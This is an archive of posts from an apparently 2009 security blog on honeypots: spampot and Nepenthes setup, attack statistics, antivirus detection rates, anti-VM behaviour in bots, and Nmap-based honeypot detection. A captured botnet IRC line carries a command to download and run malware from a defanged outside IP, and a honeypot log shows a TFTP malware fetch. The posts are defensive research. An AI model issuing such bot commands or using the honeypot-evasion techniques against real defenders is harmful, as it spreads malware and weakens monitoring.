Archive

Archive for the ‘Honeypot’ Category

Experience on Open Mail Relay Server for Honeypot

by .hac on December 8th, 2009

This is a report more than discovery in spam collection. I was working on setting up a spampot using spampot.py which was written by Neale Pikett back to 2003. Although the result is not as my expectation, it does gives me more information about setting up a spampot.

Goal

The goal of running a spampot (honeypot which only care about spam) is to collect spam and analysis the trend of them, hopefully we can find some interesting techniques that spammers/ hackers use in junk and phishing emails.

Approach
So far, there are at least two types of spampot hosting method that I know. The names of them are designed by me, if there are formal names for them, please let me know.

Open Relay Spampot: This kind of honeypot is running as an open mail relay server. In case you are not familiar with, open relay means users can send message through the server anonymously.

Close Relay Spampot: The spampot is running as a close mail relay server. To expose the server to spammers, you need to have your own domain binding to this server with email address(es) exposing to spammers/ hackers. For example, we can have onhacks.org binding to a spampot and spam@onhacks.org is one of the email address we want to expose to spammers. However, about the methods to increase the exposure of an email addresses is out of scope, we can discuss more on it later.

In my setup, I decided to run spampot as open mail relay server.

Setup
I have VirtualBox installed on top of Windows 7. I am using Ubuntu as the guest OS, this is because it seems the implementation was done in *nix system. Since port 25 is the default port for SMTP service, we need to forward packets from host (Win7) to guest (Ubuntu) so that the spampot in guest OS can react to incoming connection at host port 25.

(Assuming that you are using NAT for VirtualBox)
To enable port forwarding, you need to set the HostPort 25 forwarding to GuestPort 25. For more detail around port forwarding in VirtualBox, please refer to this article.

However, you will soon discover that it is not possible to perform port forwarding if the port is reserved (< 1024). This can easily be resolved by running VirtualBox with admin credential (ie. Run As Administrator).

The spampot.py requires Sendmail being installed in Linux. Since sendmail actually is a service listening to port 25, I will do the follow to switch to spampot.py:

sudo /etc/init.d/sendmail stop
sudo spampot.py 0.0.0.0

Surely you can set this automatically run when the system is started.

The last thing is to add a DNS record pointing to my machine. I have smtp.onhacks.org. pointing to it. Since it is still under experiment, the machine is running at home and IP is dynamic, I need to change it often.

Result
Currently, I got 0 message after running the spampot for few days. I have google around and looks like open relay spampot is not that popular anymore because many server admins aware that spammers were abusing open mail relay servers, they don’t allow open relay anymore. As a result, submitting spams to open relay servers is not efficient anymore.

I will continue running the spampot these days and see if we can get more spam through open relay honeypot. Afterward, I will work on close relay spampot.

Reference

  1. Open mail relay – Wikipedia
  2. spampot.py – written by Neale Pickett
  3. Configure Port Forwarding to a VirtualBox Guest OS – Tombuntu
  4. SpamPots Project – Cert.org
  5. Brazilian Honeypots Alliance

Email, Honeypot, Spampot

Walkthrough on Honeypot Forensics by Honeynet Hong Kong

by log0 on August 31st, 2009

The Hong Kong chapter of Honeynet, led by Peter Cheung and Roland Cheung, has produced two walkthroughs on their high interaction honeypot findings, windows and linux. There are not many detailed walkthrough out there, and hence I wrote one. They gave a detailed (with images!) walkthrough on how to do forensics on a honeypot. I encourage avid learners to take a step and get something out of them.

Windows

http://www.honeybird.hk/project/wp-content/uploads/2009/04/honeypot-study-windows-2008.pdf

Linux

http://www.honeybird.hk/project/wp-content/uploads/2009/02/honeypot-study-linux-2008.pdf

(Hey.. I really don’t know the Chinese term for Forensics…) I got the term from 冰血封情 on  EvilOctal .. it’s 取証. Thanks. =)

Honeypot

Botnet Update In Action

by log0 on August 23rd, 2009

I am currently developing a tool to automate tracking botnets. Input is a folder of binaries, and output is endless bot logs (commands, conversations, how they work), plus (possibly unseen. undetected) malware binaries and hopefully automated analysis too. =)

Here is something my tool caught while I was testing on a botnet. I used one of the malware binaries caught by my honeypot to infiltrate the botnet =) They are paying off!

2009-08-23 18:27:20,644 – log-6 – INFO – Received : [:irc.efnet.com 332 [ #xx6 :.flushdns |.down -S |.update -S |.update http://94[dot]76[dot]194[dot]116/xx8.exe x5s5g6q3×1n3.exe x5s5g6q3×1n3]

There is some Deutsch (German) stuffs… not necessarily their stuffs though. Disconnected me.

ERROR :Closing Link: [[<my ip, removed!!!>] (Client hat die Verbindung getrennt)

The binary is very new, just 4 hours ago at 2009-08-23 18:27:20,644 ( GMT +8 ).

The binary at http://94[dot]76[dot]194[dot]116/xx8.exe (MD5sum : 7904937c07c031e81023dbd81ac93b64) has VirusTotal results :

File winhost.exe received on 2009.08.22 15:54:06 (UTC)
Current status: finished

Result: 6/41 (14.63%)

Antivirus Version Last Update Result
a-squared 4.5.0.24 2009.08.22 -
AhnLab-V3 5.0.0.2 2009.08.21 -
AntiVir 7.9.1.3 2009.08.21 -
Antiy-AVL 2.0.3.7 2009.08.21 -
Authentium 5.1.2.4 2009.08.22 -
Avast 4.8.1335.0 2009.08.21 -
AVG 8.5.0.406 2009.08.22 Worm/Generic.AHOV
BitDefender 7.2 2009.08.22 -
CAT-QuickHeal 10.00 2009.08.22 -
ClamAV 0.94.1 2009.08.22 -
Comodo 2058 2009.08.22 -
DrWeb 5.0.0.12182 2009.08.22 BackDoor.IRC.Bot.127
eSafe 7.0.17.0 2009.08.20 -
eTrust-Vet 31.6.6694 2009.08.21 -
F-Prot 4.4.4.56 2009.08.22 -
F-Secure 8.0.14470.0 2009.08.21 -
Fortinet 3.120.0.0 2009.08.22 PossibleThreat
GData 19 2009.08.22 -
Ikarus T3.1.1.68.0 2009.08.22 -
Jiangmin 11.0.800 2009.08.21 -
K7AntiVirus 7.10.825 2009.08.22 -
Kaspersky 7.0.0.125 2009.08.22 Net-Worm.Win32.Kolab.dpo
McAfee 5716 2009.08.21 -
McAfee+Artemis 5716 2009.08.21 Artemis!7904937C07C0
McAfee-GW-Edition 6.8.5 2009.08.22 -
Microsoft 1.4903 2009.08.22 -
NOD32 4358 2009.08.22 -
Norman 6.01.09 2009.08.21 -
nProtect 2009.1.8.0 2009.08.22 -
Panda 10.0.0.14 2009.08.22 -
PCTools 4.4.2.0 2009.08.22 -
Prevx 3.0 2009.08.22 Low Risk Adware
Rising 21.43.50.00 2009.08.22 -
Sophos 4.44.0 2009.08.22 -
Sunbelt 3.2.1858.2 2009.08.22 -
Symantec 1.4.4.12 2009.08.22 -
TheHacker 6.3.4.3.385 2009.08.22 -
TrendMicro 8.950.0.1094 2009.08.22 -
VBA32 3.12.10.9 2009.08.22 -
ViRobot 2009.8.22.1897 2009.08.22 -
VirusBuster 4.6.5.0 2009.08.21 -

Detection rate 14.63%! Only 6/41 scanners detected it. Except Kaspersky, AVG, and DrWeb, the other 3 seems to give uncertain generic results.

Which scanner are you using?

我在寫一個自動化工具去追蹤殭屍網絡。只要一堆 EXE,就自動產生一堆殭屍網絡的實況(指令、對話、如何運作)、(有可能是未被發現及不能檢測到的)惡意檔及(希望未來能有的)自動化分析。

這是我的工具在測試時從殭屍網絡抓到的東東:

Honeypot ,

Concept of Virtual Machines and Honeypots Detection Techniques

by log0 on August 21st, 2009

In “Who is Hacking Me?“, I mentioned using Nmap to do a service probe on a low interaction honeypot. I wrote briefly how to do it in my last post. The “How” part of this article [add link to the previous article] is not uninteresting, but it is the “Why” part I’d like to focus on. You know, we hackers know why things are done so, not just how. So,

Why does the methodology work?

First, ask yourself :

How do you tell a human from a computer?

The CAPTCHA solution : You test the target to recognize some text in an image. If the target passed the test, it’s likely human. If not, it’s likely computer. The idea is that computers cannot do image recognition well, and actually quite bad.

Generalizing, we ask the target to do things only a human can do well but not computers. If the target being tested fails our human test, we conclude it with certain confidence that it is not human.

Well, CAPTCHA works for computers and humans. What about real services and emulated services?

In the same manner, the concept is that : an emulated service and a real service is technically different in implementation, and that difference makes them distinguishable. By targetting these differences, it gives you a hint to the identity of the service.

Let’s go through yet another real example. One question people loves to ask is :

How do I analyze a malware with anti-virtual-machine technology? It does not run in my vmware! Should I use a physical machine?

Wait, but it runs in my VirtualBox. Oh!

Go download any SdBot online or any found in the wild. They are normally armed with an anti-VM (anti-virtual machine) module, which stops the bot execution if it detects it’s in a VM. You can try that in VMWare, specifically VMWare. Then, go try it in VirtualBox. But, save yourself some time, I have tested already. =)

Wrong question, what you shouldask is :

How does the SdBot tell between VMware and a physical machine?

It works because there are technical differences between the implementation of a VM and a physical machine. It is the same idea of emulated services and real services mentioned in the previous article. When I said that it is because of technical differences, it means it is related to its implementation.

Precisely, SdBot running in VirtualBox but not VMware means that SdBot is not anti-VM but anti-VMWare because it is specifically targetting VMWare, but not VirtualBox.

Consider these points :

  • VMWare could set a register when a physical machine doesn’t.
  • There’s a dhcpd service provided by the VMware which is not generally present in real machines.
  • Some instructions in physical CPU are not implemented/supported in VMware.

These techniques are all based on the principle above.

Though, the above also implicated something else : the anti-vm techniques are specific to certain implementations, and you can use some less common virtual machine implementation (VirtualBox, Xen, etc… ) and the SdBot WILL execute, because the anti-vm technique does not apply to VirtualBox, Xen, etc. However, there is no guarantee the anti-vm technique can only hit one implementation, it can target multiple implementation weaknesses.

So, if you have to analyze SdBot in a virtualized environment. You do not need to run it on a physical machine with test automation to take care of the environment. You can create an environment or disable the technique or whatsoever. That is how it works behind the scenes. That goes the same for honeypots in the general idea. So, happy honeypot hunting!

Honeypot

One Method to Detect Low Interaction Honeypots

by log0 on August 13th, 2009

In “Who is Hacking Me?“, I mentioned using Nmap service probes on the honeypot to yield interesting results.

Here is the scan without service probes (sanitized) :

# Nmap 4.90RC1 scan initiated Sat Jul 11 00:39:13 2009 as: nmap -oN result.sS.txt -v -sS <XXXXXX>

Host <xxxxxx> (aaa.bbb.ccc.ddd) is up (0.092s latency).
Interesting ports on <xxxxxx> (aaa.bbb.ccc.ddd):
Not shown: 550 filtered ports, 434 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
25/tcp   open  smtp
110/tcp  open  pop3
139/tcp  open  netbios-ssn
143/tcp  open  imap
443/tcp  open  https
465/tcp  open  smtps
993/tcp  open  imaps
995/tcp  open  pop3s
1023/tcp open  netvenuechat
1025/tcp open  NFS-or-IIS
2103/tcp open  zephyr-clt
2105/tcp open  eklogin
2107/tcp open  unknown
3372/tcp open  msdtc
Read data files from: /usr/local/share/nmap
# Nmap done at Sat Jul 11 00:41:08 2009 — 1 IP address (1 host up) scanned in 114.52 seconds

Here is the scan with service probes :

# Nmap 4.90RC1 scan initiated Sat Jul 11 00:43:00 2009 as: nmap -oN result.sS.O.sV.txt -O -sV -v -sS <xxxxxx>
Increasing send delay for aaa.bbb.ccc.ddd from 0 to 5 due to 24 out of 79 dropped probes since last increase.
Initiating OS detection (try #1) against <xxxxxx> (aaa.bbb.ccc.ddd)
Retrying OS detection (try #2) against <xxxxxx> (aaa.bbb.ccc.ddd)
Host <xxxxxx> (aaa.bbb.ccc.ddd) is up (0.091s latency).
Interesting ports on <xxxxxx> (aaa.bbb.ccc.ddd):
Not shown: 550 filtered ports, 434 closed ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Nepenthes HoneyTrap fake vulnerable ftpd
22/tcp   open  ssh           OpenSSH 5.1p1 Debian 5ubuntu1 (protocol 2.0)
25/tcp   open  smtp?
110/tcp  open  pop3?
139/tcp  open  netbios-ssn?
143/tcp  open  imap?
443/tcp  open  ssh           OpenSSH 5.1p1 Debian 5ubuntu1 (protocol 2.0)
465/tcp  open  smtps?
993/tcp  open  imaps?
995/tcp  open  pop3s?
1023/tcp open  netvenuechat?
1025/tcp open  NFS-or-IIS?
2103/tcp open  zephyr-clt?
2105/tcp open  eklogin?
2107/tcp open  unknown
3372/tcp open  msdtc?
4 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :


Read data files from: /usr/local/share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
# Nmap done at Sat Jul 11 00:48:38 2009 — 1 IP address (1 host up) scanned in 338.94 seconds

Nmap shows a lot of question marks because these services all show odd behaviour from many known implementations. That’s because a low interaction honeypot only emulates a part of the target service, which means its missing basic behaviour could be detected as something unknown by Nmap service probes. The service probes are used to identify the software version and actual software using the port. If you see similar output, this is unlikely a real computer – an emulated service, i.e. a honeypot. Of course, this is just one of the ways, and you can probably think of other ways to accomplish the same as well.

Oh yes, this works for some other low interaction honeypots other than Nepenthes, too. In my next post, I will talk about how VM-detection, honeypot-detection and how to analyze a malware that does not run in VM.

http://onhacks.org/lang/zh-hk/2009/07/12/%e8%aa%b0%e5%9c%a8%e5%85%a5%e4%be%b5%e6%88%91%e7%9a%84%e7%b3%bb%e7%b5%b1

Honeypot

Please give me your spam to spam@onhacks.org !

by log0 on August 7th, 2009

Please give me your spam, instant messenger spam, phishing spam, etc, to spam@onhacks.org .

Yes, we will be reading them!

Thank you.

Email, Honeypot

Who is Hacking Me? ~”Who Will Care” is Wrong~

by log0 on July 26th, 2009

Who is Hacking Me? ~”Who Will Care” is Wrong~

1. Who Wants My Computer
2. The Random Visitors
3. What Can They Attack
4. What Does Antivirus Say
5. Conclusion

In an attempt to answer “Who is Hacking Me?“, we have set up a Nepenthes honeypot since July 1st to 25th. This honeypot is never advertised to the honeypot, and we have never tried to lure attacks into the honeypot, hence we know all these attacks are malicious. This computer resembles very much the personal computer you are using at home. This will be what your computer sees everyday.

1. Who Wants My Computer

Many people believe attackers will only want to hack high profile targets such as government agencies, banks, and corporations. Afterall, there should be nothing that aids in your hacking into MSS or FBI, why would anyone bother?

Alas, this conclusion is purely imaginary.

Your computers are used as a stepping stone for the next attack. When the authorities traceback, it will be you who will get blamed or as a getaway for them. The attackers also will store stolen information and other illegal contents on your computer so the stolen goods does not lie in their computers. Worse, they steal information from you such as credit card numbers, passwords to emails, access to your bank, steal corporate information, and use it for identity theft such as purchasing illegal goods.

With our honeypot, we shall try to refute some common misbeliefs.

The data is solely extracted from Nepenthes log. A single event in the log consists of multiple log entries, where it is comprised of starting and finishing timestamp, vulnerability triggered, md5 and sha1 hash of malware downloaded, source of malware, remote and local ip and ports, and other information.

2. The Random Visitors

A total of 11981 attacks from 115 places around the world were observed over the last 25 days. It could be proxies or real computers. What is striking is that these attacks have no understanding of boundaries, but IP numbers only, as witnessed from the diverse variety of places the attack originated from.

region

Despite Japan represents the most number of attacks, there is no conclusion on its original source and on the soundness of the IP address logged, but we know that the attacks are very real and will infect your computer.

3. What Can They Attack

Below shows the trend of ports being attacked :

ports

Congruent to the “Who is Hacking Me? ~A Glance into The Log~” report, ports 445, 135, and 139 are most popular. What is interesting is that 8581 is also actively probed, ranking the 4th. It is unsupported by Nepenthes, but all these probes happen only on 25th July. As of this time there is no information on this.

Here are the attacks being probed :
vulns

The most popular attack is still the old MS04-007 and Blaster worm. Note that not all attacks can be distinguished because Nepenthes does not always get the data enough to distinguish the attack. The most attacked ports are 445, 135 and 139. With operating systems 0-click exploits are much less rarer now, it is no surprise the attacked ports are still the common vulnerabilities of years ago.

4. What Does AntiVirus say

In these attacks, Nepenthes successfully collected 193 binaries of 53 varieties that was sent as a payload to infected the honeypot. We will send these 53 distinct type of binaries to scan. These binaries were sent to be scanned by ClamAV and in VirusTotal.

ClamAV information :

$ clamscan -V
ClamAV 0.95.1/9614/Sun Jul 26 10:10:14 2009

Out of the 53 binaries, 41 can be detected by ClamAV. 12 binaries undetected by ClamAV were sent to Gmail, none were detected by Gmail’s antivirus scanning. Then, VirusTotal is to process these 12 binaries. All were detected by some other engines.

Some of the malware types in these 53 binaries detected by ClamAV include :

Trojan.Vanbot-166
Trojan.Mybot-11222
Trojan.Agent-11146
Trojan.Small-4287
Trojan.SdBot-4763
Worm.Padobot.M
Worm.Padobot-13
Worm.Korgo.P
Worm.Dabber.B
Worm.Kolab-366
W32.Virut-9
W32.Virut-11
W32.Virut-54

Unfortunately, there are malware that has lower detection rate including some big names :

MD5  : 4c71b97435a24ffb8fd7fedd1b1790e1
SHA1 : 225476bfa863c5f434f2e485da2ede88f12a53f8
AhnLab-V3    5.0.0.2/20090725    found nothing
AntiVir    7.9.0.228/20090724    found nothing
Antiy-AVL    2.0.3.7/20090724    found nothing
CAT-QuickHeal    10.00/20090725    found nothing
ClamAV    0.94.1/20090725    found nothing
Comodo    1763/20090725    found nothing
eTrust-Vet    31.6.6640/20090725    found nothing
F-Secure    8.0.14470.0/20090724    found nothing
K7AntiVirus    7.10.802/20090725    found nothing
Kaspersky    7.0.0.125/20090725    found nothing
McAfee    5688/20090725    found nothing
McAfee+Artemis    5688/20090725    found nothing
NOD32    4277/20090725    found nothing
Norman    6.01.09/20090724    found nothing
nProtect    2009.1.8.0/20090725    found nothing
PCTools    4.4.2.0/20090725    found nothing
Prevx    3.0/20090725    found nothing
Rising    21.39.52.00/20090725    found nothing
Sophos    4.44.0/20090725    found nothing
TheHacker    6.3.4.3.373/20090724    found nothing
TrendMicro    8.950.0.1094/20090725    found nothing
VBA32    3.12.10.9/20090724    found nothing
ViRobot    2009.7.25.1853/20090725    found nothing

Despite the ability to fail to detect, it is still necessary to have antivirus to stop a lot of threats.

5. Conclusion

With 11981 attacks an unadvertised ordinary personal computer in 25 days, comprising 193 binaries of 53 varieties and more than 14 major variants of malware from 115 places. We hope you will judge the question “Who Cares” more differently, and that the question of “Who is Hacking Me?” is very valid.

Author

“Log0″ a security researcher on honeypots, web application security, cybercrime. He writes security articles on http://onhacks.org .

===

Reference :

Nepenthes – http://nepenthes.carnivore.it/

Niels Provos, Thorsten Holz – “Virtual Honeypots: From Botnet Tracking to Intrusion Detection”

Honeypot

Who is Hacking Me?

by log0 on July 21st, 2009

(Check out the traditional chinese and simplified chinese verison!)

Who is Hacking Me?

1. Who is it
2. What is a honeypot
3. Setting a honeypot
4. Retaliation
5. Honeypot logs
6. Improving further
7. Summary

===

1. Who is it

We are under attacked all the time. How do we find out who that is?

This article will not reveal the answers immediately, but will guide you to a possible solution. If you are new to the concept of honeypot, this will be an interesting concept to you.

2. What is a honeypot

Honeypot is a fully functional operating system that its sole purpose is to be hacked, without any real value in it. It is basically the same with a normal computer, and could be a Windows or a Linux, etc. Through the hacked computer, we can monitor the attacker’s motives and actions. By logging these actions, and relating it to other identifiable information such as IP address, we hope to backtrace the attacker’s identity. By definition of a honeypot, it should have no traffic and hence any traffic is considered malicious in nature. This relieves us the effort to sieve through genuine benign conncetions to look for attackers.

Honeypots are generally in two categories, but can be a mix or other kinds :
1. High Interaction Honeypot
2. Low Interaction Honeypot

High interaction honeypot – This kind of honeypot resembles a real computer and can be used as so. It is designed to be controlled by the attacker, but with all the actions inside logged. Because it is a real computer, the attacker can initiate any sort of illegal activities and attacks on it, which means innocent people can be affected. Hence, Data Control must be deployed to control these malicious traffic from leaving, by means of such as Honeywall. Therefore, there is a risk in high interaction honeypots. Moreover, they take a complete physical machine or virtual machine, and hence is quite resourceful compared to low interaction honeypots. This article will not describe how to setup a high interaction honeypot.

Low interaction honeypot - This kind of honeypot is actually a software that emulates a vulnerability partially, such that it is enough to fool automated programs or unskilled attackers to believe it is a real system. Because it is not a fully functional program and only reads data, and that after the attack vector has been collected, the connection will be ended, the danger associated with high interaction honeypot is far less. The difference mainly lies in the fact it is not a real vulnerability and hence the attack should fail.

This article will describe how to setup a low interaction honeypot ( Nepenthes ) on Linux ( Ubuntu 9.04 ). Ubuntu ( or Debian ) is chosen because it is easier to deploy on it.

3. Setting a honeypot

We will use Nepenthes as our low-interaction honeypot. The concept of Nepenthes is to emulate vulnerabilities so it is enough to fool automated attacks and unskilled attackers. From their attack vectors and payloads, we might be able to capture skills and malware that is unseen in the public. Because it emulates a vulnerability only, it only logs the connections and hence is much safer. Moreover, even if it is attacked, the emulated vulnerabilities are only for Windows and Linux will be unaffected. It is also capable of capturing malware for analysis, allowing you to investigate into unseen malware.

Ubuntu/Debian users may employ this command :

$apt-get install nepenthes

Or download the source code from the official website :

http://nepenthes.carnivore.it/

4. Retaliation

$nepenthes

You are good to go!

If you need more information, modify  /etc/nepenthes/nepenthes.conf accordingly。

// logging
41     “logattack.so”,                 “log-attack.conf”,              “”
42     “logdownload.so”,               “log-download.conf”,            “”
43 //  “logirc.so”,                    “log-irc.conf”,                 “”  // needs configuration
44 //    “logprelude.so”,                “log-prelude.conf”,             “”
45     “loghexdump.so”                 “”                  “”

Uncomment logattack.so, logdownload.so . And you may experiment with the config file further.

5. Honeypot logs

If you are lucky, you should find entries /var/log/nepenthes.log shortly . If there is not, please wait patiently, and also check the external connectivity to your honeypot.

( The IP addresses have been modified to protect the IP logged. )


Socket|LUID=0×9b6b290|Start=1246711030.266579|Finish=1246711030.638501|Status=CONNECTED|Proto=TCP|Type=INCOMING|Local=192.168.1.4:135|Remote=xxx.96.245.148:61250|RX=2,1520,a87bbacd0cd1c84a5991ccc690492866|TX=3,532,dc9b4e2f264c732eb5b239b2bd3a23bd|Dumpfile=
Shellcode|LUID=0×9b6afd0|Start=1246711030.453659|Finish=1246711030.462127|Type=UNKNOWN|Emulation=SUCCESS|Handler=execute::createprocess|ISock=0×9b6b290|MD5=52e5dbe8fc84060525e965aa0c030f0c|Trigger=Generic Microsoft Windows DCOM
Download|LUID=0×9b6bcb8|Result=SUCCEEDED|Start=1246711030.461798|Finish=1246711185.861585|ISock=0×9b6b290|SSock=|MD5=5069160ffe5a229ed2ee1ddd8ca14df6|SHA512=ca50e009cad7f861759f85f8db74a684f6eee8f081bcdc255414ca898bbd7ef5c14c8a7bdd875201a51581ea484a49f4cceaf90ecef526c8bdda0d5ae94e24f5|Trigger=Download Initiated by Shell Command|URL=tftp://xxx.96.245.148/ssms.exe


This is an attack from xxx.96.245.148:61250 to my private network 192.168.1.4:135. The MD5 hash of the captured binary is 5069160ffe5a229ed2ee1ddd8ca14df6, which VirusTotal identifies as Net-Worm.Win32.Kolabc.gwr.

6. Improving Further

We can use NMap to scan our Honeypot 192.168.1.4 .

Here is the results of NMap :

# Nmap 4.90RC1 scan initiated Sat Jul 11 01:39:09 2009 as: nmap -oN 192.168.1.4.sS.txt -v -sS 192.168.1.4
Host 192.168.1.4 is up (0.000011s latency).
Interesting ports on 192.168.1.4:
Not shown: 975 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
25/tcp    open  smtp
42/tcp    open  nameserver
80/tcp    open  http
110/tcp   open  pop3
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
143/tcp   open  imap
443/tcp   open  https
445/tcp   open  microsoft-ds
465/tcp   open  smtps
993/tcp   open  imaps
995/tcp   open  pop3s
1023/tcp  open  netvenuechat
1025/tcp  open  NFS-or-IIS
2103/tcp  open  zephyr-clt
2105/tcp  open  eklogin
2107/tcp  open  unknown
3372/tcp  open  msdtc
5000/tcp  open  upnp
5901/tcp  open  vnc-1
6129/tcp  open  unknown
10000/tcp open  snet-sensor-mgmt
10012/tcp open  unknown

Read data files from: /usr/local/share/nmap
# Nmap done at Sat Jul 11 01:39:09 2009 — 1 IP address (1 host up) scanned in 0.17 seconds

For an averaged skilled hacker, this can be very attractive but at the some time too good to be true. It is just full of holes, much like welcoming visitors. To improve the authenticity, consider exposing only some the ports. For instance, go to /etc/nepenthes/nepenthes.conf, comment :

57 // vulnerability modules

62     “vulniis.so”,                   “vuln-iis.conf”,                “”
63 //    “vulnkuang2.so”,                “vuln-kuang2.conf”,             “”
64     “vulnlsass.so”,                 “vuln-lsass.conf”,              “”

Interested individuals may add a -sV modifier to NMap ( Send service probes to fingerprint software and its version ). You may find some interesting results!

7. Summary

We are under attacked all the time, but we do not know who they are. Through honeypots, you may learn about the attacker’s motives, and make the first attempt to answer “Who is Hacking Me?”. We introduced a low interaction honeypot, Nepenthes, in this article, but it is only but one of the many honeypots available. Through high interaction honeypot, you may learn even more about the attacker. Now, you are no longer passive, but proactive. You can now learn what is happening behind the scenes.

Author

“Log0″ a security researcher on honeypots, web application security, cybercrime. He writes security articles on http://onhacks.org .

===

Reference

Nepenthes – http://nepenthes.carnivore.it/

Niels Provos, Thorsten Holz – “Virtual Honeypots: From Botnet Tracking to Intrusion Detection”

Honeypot

Who is hacking me? ~A Glance into The Log~

by log0 on July 15th, 2009

poohhoney


Nepenthes has been collecting data these few days, and I’d like to share some of the rough data now. Since it is just a single server, do not generalize it over the banks’, corporates’, significantly valued servers’ situation, but this is what YOUR computer can see. Remember, I never exposed the honeypot, so ALL connections are malicious.

** Most Attacks Region **
[       Russian Federation] has 57 attacks on you.
[                   Taiwan] has 36 attacks on you.
[                   Brazil] has 32 attacks on you.
[                  Germany] has 21 attacks on you.
[            United States] has 20 attacks on you.
[                    Italy] has 16 attacks on you.
[                  Romania] has 15 attacks on you.
[           United Kingdom] has 14 attacks on you.
[       Korea, Republic of] has 13 attacks on you.
[                    India] has 11 attacks on you.
[                   Poland] has 10 attacks on you.
[              Philippines] has 10 attacks on you.
[                    Japan] has 10 attacks on you.
[                   Canada] has 9 attacks on you.
[                 Bulgaria] has 9 attacks on you.
[                  Hungary] has 8 attacks on you.
[                 Malaysia] has 8 attacks on you.
[                   France] has 6 attacks on you.
[                Argentina] has 6 attacks on you.
[                    China] has 6 attacks on you.

This is 12 July 2009.

Apparently, Russian seems to be the largest supplier of zombies (much like Resident Evil!), being steadily the first ( I have a week of data ). Next, surprisingly (to me), comes Taiwan. The next one is easy, Brazil, as Microsoft SIR 5th report geolocation section has suggested. The next one is Germany, which is not like what I’ve seen on Microsoft SIR 5th. Afterall, this is just too weak to generalize, but you can check it out.

Remember, IP address has no national boundaries.

** Most Visited Ports **
[  445] : 385
[  135] : 39
[  139] : 7
[   25] : 1

Port 445 and Port 135 score highest. Very likely to be :

Port 445 – MS04-011 at http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx

Port 135 -MS03-026, a.k.a W32 Blaster at http://www.microsoft.com/technet/security/bulletin/MS03-026.mspx

I am still in the middle of making sense of all the data, but the above is something you may glimpse from the mess.

(Yes, I think I should write an English version for the previous “Who is hacking me?” post.)

(7/16/2009 Updated title, and read here for the first story.)

===

Reference / 參考 / 参考 / さんこう / Referencia / Referenz / Справка :

Microsoft Security Intelligence Report volume 5
Zombie Computer – Wikipedia
殭屍電腦 – 維基百科

** Most Visited Ports **
[  445] : 385
[  135] : 39
[  139] : 7
[   25] : 1

Honeypot, Malware

Who is hacking me?

by log0 on July 12th, 2009

English version is here.

Honeypot